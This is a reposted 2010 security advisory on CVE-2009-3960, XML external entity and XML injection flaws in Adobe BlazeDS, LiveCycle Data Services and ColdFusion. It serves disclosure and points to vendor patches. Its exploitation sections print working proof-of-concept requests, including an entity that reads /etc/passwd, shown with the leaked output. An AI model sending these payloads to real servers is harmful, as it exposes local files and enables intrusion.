首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Products XML External Entity And XML Injection Vulnerabilities
来源:vfocus.net 作者:Liverani 发布时间:2010-02-23  
====================================================================
Adobe Products XML External Entity And XML Injection Vulnerabilities
====================================================================

Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
 
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
 
+-----------+
|Description|
+-----------+
 
Security-Assessment.com discovered that multiple Adobe
products with different Data Services versions are
vulnerable to XML External Entity (XXE) and XML
injection attacks.
XML external Entities injection allows a wide range of
XML based attacks, including local file disclosure,
TCP scans and Denial of Service condition, which can
be achieved by recursive entity injection, attribute
blow up and other types of injection.
For more information about the implications associated
to this vulnerability, refer to the RFC2518 (17.7
Implications of XML External Entities):
http://www.ietf.org/rfc/rfc2518.txt
 
+--------------+
|Product Review|
+--------------+
 
Adobe Data Services components provide Flex/RIA
applications with data messaging, remoting and
management capabilities.
 
The discovered vulnerabilities affect the HTTPChannel
 servlet classes which are respectively
“mx.messaging.channels.HTTPChannel” and
“mx.messaging.channels.SecureHTTPChannel”. These
classes are part of the Data Services Messaging
classes and can be found in the
flex-messaging-common.jar Java archive.
 
The HTTPChannel transports data in the AMFX format,
which is the text-based XML representation of AMF.
The HTTPChannel endpoints are defined in the
services-config.xml file, located within the
Flex/WEB-INF folder of the application.
By default, the HTTPChannel classes are mapped to
the following endpoints:
 
1. http://{server.name}:{server.port}/{context.root}/messagebroker/http
2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure
 
Note that the HTTPChannel may be mapped to different
endpoints.
This depends on the deployed application and the
framework in use (e.g. BlazeDS, Adobe LiveCycle
Data Services, etc.).
 
+--------------------------------------------+
|Exploitation - XML External Entity Injection|
+--------------------------------------------+
 
XML entities can be declared and included within AMFX
requests passed to the HTTPChannel. The XML parser
parses the payload and successfully processes
injected entities.
 
The following table shows an example of XML external
entity injection which leads to local file disclosure.
The AMFX request is sent via the HTTPChannel endpoint
in BlazeDS.
 
XML External Entity Injection – Local File Disclosure
PoC – BlazeDS – Request
 
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
  <body>
    <object type="flex.messaging.messages.CommandMessage">
      <traits>
        <string>body</string><string>clientId</string><string>correlationId</string>
        <string>destination</string><string>headers</string><string>messageId</string>
        <string>operation</string><string>timestamp</string><string>timeToLive</string>
      </traits><object><traits />
      </object>
      <null /><string /><string />
      <object>
        <traits>
          <string>DSId</string><string>DSMessagingVersion</string>
        </traits>
        <string>nil</string><int>1</int>
      </object>
      <string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
    </object>
  </body>
</amfx>
 
 
XML External Entity Injection – Local File Inclusion
PoC – BlazeDS – Response
 
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">
<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>
<body targetURI="/onResult" responseURI="">
<object type="flex.messaging.messages.AcknowledgeMessage">
<traits><string>timestamp</string><string>headers</string>
<string>body</string><string>correlationId</string>
<string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string>
</traits><double>1.257387140632E12</double><object>
<traits><string>DSMessagingVersion</string>
<string>DSId</string></traits><double>1.0</double>
<string>BDE929FE-270D-3B56-1061-616E8B938429</string>
</object><null/><string>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
[...]
 
 
The above injection was successfully tested on
multiple Adobe products, as shown below:
 
1. Product: Adobe BlazeDS 3.2.0.39
Linux Ubuntu 9.04 / Tomcat 6.0.14
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
 
2. Adobe LiveCycle Data Services ES2 3.0
Windows XP SP2 / Tomcat 6.0.14
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
3. ColdFusion 9.0
Windows XP SP2 / Tomcat 6.0.14
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/flex2gateway/http
{server.name}:{server.port}/
{context.root}/flex2gateway/httpsecure 
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
4. Adobe LiveCycle ES2
Windows XP SP2 / IBM Websphere 7.0
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
 
+----------------------------+
|Exploitation - XML Injection|
+----------------------------+
 
The XML parser lacks of proper input and output
validation controls. Security-Assessment.com managed
to inject arbitrary XML content which was returned
in the XML response.
The following table shows an XML injection in the
BlazeDS HTTPChannel. The injected payload becomes
part of the response. In this case, injection is
possible via the “responseURI” attribute.
 
XMLInjection – BlazeDS - Request
 
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
 
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d&quot; injectedattr=&quot;anything"><null/>
</body></amfx>
 
XMLInjection – BlazeDS - Response
 
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>
 
The above injection was successfully tested on
multiple Adobe products, as shown below:
 
1. Product: Adobe BlazeDS 3.2.0.39
Linux Ubuntu 9.04 / Tomcat 6.0.14
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
 
2. Adobe LiveCycle Data Services ES2 3.0
Windows XP SP2 / Tomcat 6.0.14
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
3. ColdFusion 9.0
Windows XP SP2 / Tomcat 6.0.14
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/flex2gateway/http
{server.name}:{server.port}/
{context.root}/flex2gateway/httpsecure 
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
4. Adobe LiveCycle ES2
Windows XP SP2 / IBM Websphere 7.0
 
Endpoint URIs:
 
{server.name}:{server.port}/
{context.root}/messagebroker/http
{server.name}:{server.port}/
{context.root}/messagebroker/httpsecure
 
Methods: POST, GET
Protocols: HTTP, HTTPS
 
 
The vendor has released several patches for this
vulnerability. See the Solution section of this
document for more information.
 
 
+--------+
|Solution|
+--------+
 
Security-Assessment.com follows responsible
disclosure and promptly contacted the vendor after
discovering the issues. The vendor was contacted on
the 6th November 2009 and a reply was received on the
same day. The vendor released security patches on
the 11th February 2010.
   
The security patches can be downloaded at the
following website:
 
http://www.adobe.com/support/security/bulletins/apsb10-05.html
 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec Antivirus 10.0 Active
·iFTPStorage v1.2 for Iphone\Ip
·cPanel Multiple CSRF Vulnerabi
·Coppermine Photo Gallery <= 1.
·Windows Media Player 11.0.5721
·Easy~Ftp Server v1.7.0.2 (HTTP
·Winamp 5.57 (Browser) IE Denia
·FileApp v1.7 for iPhone/iPod R
·Nero Burning ROM v9.4.13.2 (is
·gitWeb v1.5.2 Remote Command E
·VKPlayer 1.0 (.mid) Denial of
·Rising Online Virus Scanner v2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved